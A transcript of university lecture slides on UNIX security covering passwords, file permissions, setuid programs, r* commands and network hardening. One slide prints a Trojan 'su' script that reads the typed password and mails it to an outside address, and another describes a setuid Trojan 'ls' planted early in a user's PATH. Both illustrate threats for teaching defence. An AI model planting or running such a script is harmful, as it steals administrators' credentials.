Presentation is loading. Please wait.

Presentation is loading. Please wait.

2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani Lecture 11.

Published by Modified over 8 years ago

Similar presentations

Presentation on theme: "2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani Lecture 11."— Presentation transcript:

1 2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani email: lahmani@cs.nyu.edu Lecture 11

2 2000 Copyrights, Danielle S. Lahmani Security Definition “Making sure that the data stored on a computer or computer networks, is accessible only to people who are authorized to see it, and that the data is safeguarded against corruption or loss. “ by K. Christian

3 2000 Copyrights, Danielle S. Lahmani Two major goals of security Protect data against loss (can be achieved through frequent backups) secure the system against intrusion and unauthorized use.

4 2000 Copyrights, Danielle S. Lahmani COMPONENTS OF SECURITY Authentication: proving that you are who you say you are Access Rights: giving you the information for which you have clearance Integrity: Protecting information from unauthorized exposure Prevention of subversion: guard against replay attacks,Trojan horse attacks and Covert Channel attacks.

5 2000 Copyrights, Danielle S. Lahmani Security Definitions A Trojan Horse is any program that performs some obvious functions and compromises a user's security at the same time. A covert channel is some way of getting information other than direct reads and writes, examples are the ps command or the viewing of /tmp.

6 2000 Copyrights, Danielle S. Lahmani Protection against Intruders Password Security File and file system security Incorrect search PATH denial of service networking security

7 2000 Copyrights, Danielle S. Lahmani Passwords and Accounts Every person should have his or her individual account. Remove the accounts of people who no longer need it or have left the company provide user with initial password and instruct user to change it immediately

8 2000 Copyrights, Danielle S. Lahmani How passwords Work Passwords are encrypted: –login program uses the “salt” to encrypt typed password and then check if the resulting string matches the password stored in /etc/passwd

9 2000 Copyrights, Danielle S. Lahmani Password Security People often use password that can be guessed easily. Several measures to protect login password: –Most UNIX systems split /etc/passwd file into two files: The file /etc/passwd no longer contains the encrypted user password /etc/shadow contains the encrypted password that can only be read by root, to avoid subversion, making it less vulnerable to password cracking.

10 2000 Copyrights, Danielle S. Lahmani Security Measures for password security Passwords should be changed periodically Don't use same password on multiple machines Don't use a previous password. If it was stolen before, the system can be compromised. Educate users about bad passwords and good passwords. Use password filtering Enforce password aging.

11 2000 Copyrights, Danielle S. Lahmani Files and file system security: –A file can be writer-locked, but if the directory is writable, an intruder can erase your file and write a new one. –File permissions modes are discretionary: the owner of the file can change them when it wants. –Don't make you files or directories writable by others Make the directory containing the file and its subdirectories write protected

12 2000 Copyrights, Danielle S. Lahmani File and File system Security –Use your own temporary directory under $HOME/tmp, /tmp and /usr/tmp are writable by others. Although your temporary file under these directories is writable only by you, a user can replace a temporary file in /tmp or /usr/tmp, which has the effect of changing your files.

13 2000 Copyrights, Danielle S. Lahmani set uid/set gid programs This is a feature whereby a program during its invocation acquires privileges of either a superuser or an author (the owner of the file) for the duration of the execution.

14 2000 Copyrights, Danielle S. Lahmani setuid/setgid subversion You can create a version of ls in a user's directory that preceeds /bin in his path. This version has setuid bit on. The first thing it does is to create a new file with setuid bit on. Then it erases itself with some indication that a line has been disconnected. If you executed the file, you would have all the owner's privileges

15 2000 Copyrights, Danielle S. Lahmani Scripts Precautions do not write SUI/SGID shell scripts. Scripts should always have full pathnames

16 2000 Copyrights, Danielle S. Lahmani Superuser Precaution Discourage or disable direct login as root use /bin/su to gain root privileges: /bin/su attempts are logged with the name of the user who issued the su command

17 2000 Copyrights, Danielle S. Lahmani su: subversion –Have the following script su and place it in a directory that administrators can search before the system's directories( will only work if path is set to search current dir first): stty -echo echo -n Password:" read X echo "" stty echo echo $X | mail outside!creep & sleep 1 echo Sorry. rm su

18 2000 Copyrights, Danielle S. Lahmani Security recommendations Root Accounts: Login directly as root only at the console Only root should have uid 0 Root should never have a "." in its path Only use full pathnames when issuing a command Do not create root temp files if possible in publicly owned directories.

19 2000 Copyrights, Danielle S. Lahmani UNIX NETWORK SECURITY BERKELY SERVICES The R* commands allow host equivalency which is based on the idea that if the user has been authenticated on one trusted computer (host), then there is no reason to reauthenticate the user on a second computer. Host equivalence is extended through use of.rhost,.netrc and /etc/hosts.equiv files.

20 2000 Copyrights, Danielle S. Lahmani Berkeley r* commands An ordinary user can create a file.rhost in her $HOME direcotry and extend host equivalence to herself when accessing the computer without any intervention from a system administrator. In Sun systems, the r* commands have been modified to run on top of ssh (secure shell) which requires a password and ignores.rhosts equivalence.

21 2000 Copyrights, Danielle S. Lahmani Security Standards and technology S-HTTP: Secure HTTP is an extension to the HTTP protocol to provide authentication and encryption facilities at the setup of a session. Client and Server negotiate which encryption mechanism will be used to secure the messages. (SSL) Secure Socket Layer provides server authentication, data encryption and message integrity at the transport layer. Use of SSL and S-HTTP is not mutually exclusive.

22 2000 Copyrights, Danielle S. Lahmani Security Standards (cont’) Secure IP (IPV6) is a specification for extensions to the IP protocol that includes additional security functions: an authentication header and the encapsulation security payload (ESP) protocol. Authentication header holds computed authentication information based on the message. ESP protocol provides the ability to encrypt some or all of the messages.

23 2000 Copyrights, Danielle S. Lahmani RECOMMENDATIONS FOR NETWORK SECURITY Source: http://www.unixtools.com/se curecheck.html http://www.unixtools.com/se curecheck.html

24 2000 Copyrights, Danielle S. Lahmani Network Security: Filtering Do not enable services your are not using (/etc/inetd.conf)  Create access control lists /var/adm/inted.sec to say what hosts can connect  Filter out unnecessary services at router, only allow services you need.  If your are on the Internet, build a firewall.

25 2000 Copyrights, Danielle S. Lahmani FTP SECURITY  Make sure you have /ftp/users will all system accounts (uucp, bin, root)  Minimal permissions/ minimal accounts  Always use FTP logging and look at logs Make directories unwriteable

26 2000 Copyrights, Danielle S. Lahmani PREVENT SPOOFING Router mode:  Turn off source routing  Apply a filter that guarantees that packets coming from the outside network do not have a source IP address that matches the inside network.  Qualified hostnames only in system files (NFS, hosts.equiv…)  No host.equiv or.rhosts if possible.

Download ppt "2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani Lecture 11."

Similar presentations

Dr. Kalpakis CMSC 421, Operating Systems. Fall 2008 URL: Security.

Dr. Kalpakis CMSC 421, Operating Systems. Fall 2008 URL: Security.
BASIC CRYPTOGRAPHY CONCEPT. Secure Socket Layer (SSL)  SSL was first used by Netscape.  To ensure security of data sent through HTTP, LDAP or POP3.

BASIC CRYPTOGRAPHY CONCEPT. Secure Socket Layer (SSL)  SSL was first used by Netscape.  To ensure security of data sent through HTTP, LDAP or POP3.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.

1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
CS426Fall 2010/Lecture 81 Computer Security CS 426 Lecture 8 User Authentication.

CS426Fall 2010/Lecture 81 Computer Security CS 426 Lecture 8 User Authentication.
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
1 Objectives Configure Network Access Services in Windows Server 2008 RADIUS 1.

1 Objectives Configure Network Access Services in Windows Server 2008 RADIUS 1.
Security Presented by : Qing Ma. Introduction Security overview security threats password security, encryption and network security as specific.

Security Presented by : Qing Ma. Introduction Security overview security threats password security, encryption and network security as specific.
System and Network Security Practices COEN 351 E-Commerce Security.

System and Network Security Practices COEN 351 E-Commerce Security.
TCP/IP Protocol Suite 1 Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display. Chapter 30 Internet Security.

TCP/IP Protocol Suite 1 Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display. Chapter 30 Internet Security.
Chapter 7 HARDENING SERVERS.

Chapter 7 HARDENING SERVERS.
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.
2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani Lecture 10.

2000 Copyrights, Danielle S. Lahmani UNIX Tools G , Fall 2000 Danielle S. Lahmani Lecture 10.
Lesson 19: Configuring Windows Firewall

Lesson 19: Configuring Windows Firewall
CS 497C – Introduction to UNIX Lecture 35: - TCP/IP Networking Tools Chin-Chih Chang

CS 497C – Introduction to UNIX Lecture 35: - TCP/IP Networking Tools Chin-Chih Chang
1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.

1 Lecture 20: Firewalls motivation ingredients –packet filters –application gateways –bastion hosts and DMZ example firewall design using firewalls – virtual.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Intranet, Extranet, Firewall. Intranet and Extranet.

Intranet, Extranet, Firewall. Intranet and Extranet.
Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.

Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.
Computer Security An overview of terms and key concepts.

Computer Security An overview of terms and key concepts.
SYSTEM ADMINISTRATION Chapter 13 Security Protocols.

SYSTEM ADMINISTRATION Chapter 13 Security Protocols.

Similar presentations

Ads by Google